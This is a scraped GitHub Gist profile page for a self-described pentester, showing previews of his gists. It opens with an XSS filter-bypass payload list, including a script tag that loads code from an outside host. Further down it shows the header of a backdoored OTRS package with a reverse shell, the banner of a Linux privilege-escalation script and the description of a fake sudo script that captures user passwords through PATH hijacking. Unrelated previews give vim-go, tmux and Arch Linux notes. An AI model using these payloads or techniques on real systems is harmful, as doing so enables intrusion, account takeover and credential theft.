Skip to content

Instantly share code, notes, and snippets.

View r3k2's full-sized avatar
🏠
on SourceHut sr.ht I do not push to github

CF_ReK2 r3k2

🏠
on SourceHut sr.ht I do not push to github
96 followers · 66 following
  • CyberSecurity, Hacker, Pentester, DevSecOps
  • Barcelona, Madrid , San Francisco, Boston CyberSpace
View GitHub Profile
@r3k2
r3k2 / xxsfilterbypass.lst
Last active November 15, 2017 09:15 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@r3k2
r3k2 / MyPackage.opm
Created September 27, 2017 09:29 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
@r3k2
r3k2 / LinuxPrivEsc.sh
Created August 24, 2017 21:31 — forked from 1N3/LinuxPrivEsc.sh
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
@r3k2
r3k2 / Install vim-go
Last active January 13, 2017 00:59
Steps I keep forgetting to install vim-go
git clone https://github.com/fatih/vim-go.git ~/.vim/pack/plugins/start/vim-go
make sure you have your $GOPATH setup in your ~/.bashrc
open vim and type :GoInstallBinaries
use :GoUpdateBinaries to update the installed binaries
For autocompletion:
https://github.com/roxma/SimpleAutoComplPop
git clone https://github.com/roxma/SimpleAutoComplPop.git ~/.vim/pack/plugins/start/SimpleAutoComplPop
@r3k2
r3k2 / turn_monitor-mode.rb
Last active October 19, 2015 22:08
get list of all interfaces and prompt for selection of interface that we want to put in monitor mode
#!/usr/bin/env ruby
# Christian Fernandez
# rek2wilds bbk
# cfernandez hispagatos binaryfreedom
require 'open3'
require 'socket'
def monitor(int_name)
@r3k2
r3k2 / FakeSudo2Password
Last active August 29, 2015 14:08
fake sudo to grab local user passwords when you already have access at user level.
#!/usr/bin/env ruby
# HISPAGATOS.org
# probe of comcept to capture user password.
# when attacker compromise a regular use shell account, he can
# jump into root or steal user password by adding into the user enviroment
# the path where this sudo script sits example PATH=/theplace:$PATH etc notice that is BEFORE
# the rest of the path entries so any program in this path will run BEFORE the real program.
# cfernandez@hispagatos.org http://hispagatos.org
@r3k2
r3k2 / tmux-cheatsheet.markdown
Created August 11, 2014 13:46 — forked from MohamedAlaa/tmux-cheatsheet.markdown

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@r3k2
r3k2 / my Arch Linux cheat-sheet
Created May 21, 2014 04:40 — forked from tungel/my Arch Linux cheat-sheet
Installing Arch:
sudo vim /etc/pacman.conf
Update packages list: sudo pacman -Syy
run sudo pacman -Syu before installing any software (to update the repositories first)
* Timing issue:
- Change hardware clock to use UTC time:
sudo timedatectl set-local-rtc 0